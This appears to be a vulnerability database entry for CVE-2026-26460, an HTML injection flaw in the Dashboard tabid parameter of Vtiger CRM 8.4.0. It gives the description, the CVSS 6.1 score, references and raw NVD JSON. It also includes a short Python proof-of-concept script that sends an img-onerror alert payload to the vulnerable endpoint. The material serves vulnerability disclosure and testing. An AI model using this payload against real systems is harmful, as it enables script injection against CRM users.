CVE-2026-26460

Description

A HTML Injection vulnerability exists in the Dashboard module of Vtiger CRM 8.4.0. The application fails to properly neutralize user-supplied input in the tabid parameter of the DashBoardTab view (getTabContents action), allowing an attacker to inject arbitrary HTML content into the dashboard interface. The injected content is rendered in the victim's browser

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Vtiger CRM 8.4.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Change to actual target)
target = "http://localhost/vtigercrm/"

# Vulnerable endpoint
url = target + "index.php"

# Payload: Injecting an image tag to test HTML injection
payload = "<img src=x onerror=alert('CVE-2026-26460')>"

# Parameters
params = {
    "module": "Dashboard",
    "view": "DashBoardTab",
    "action": "getTabContents",
    "tabid": payload
}

try:
    response = requests.get(url, params=params, timeout=5)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Check the browser response for the injected HTML.")
        print(f"[+] Payload URL: {response.url}")
    else:
        print("[-] Request failed.")
except Exception as e:
    print(f"[-] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-26460
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-26460
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-26460/
[4] VulDB https://vuldb.com/cve/CVE-2026-26460
[5] https://www.simonjuguna.com/cve-2026-26460-html-injection-vulnerability-in-vtiger-open-source-edition-v8-4-0/
[6] https://www.vtiger.com/open-source-crm/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-26460", "sourceIdentifier": "[email protected]", "published": "2026-04-13T21:16:24.020", "lastModified": "2026-04-17T15:33:34.050", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A HTML Injection vulnerability exists in the Dashboard module of Vtiger CRM 8.4.0. The application fails to properly neutralize user-supplied input in the tabid parameter of the DashBoardTab view (getTabContents action), allowing an attacker to inject arbitrary HTML content into the dashboard interface. The injected content is rendered in the victim's browser"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}]}], "references": [{"url": "https://www.simonjuguna.com/cve-2026-26460-html-injection-vulnerability-in-vtiger-open-source-edition-v8-4-0/", "source": "[email protected]"}, {"url": "https://www.vtiger.com/open-source-crm/", "source": "[email protected]"}]}}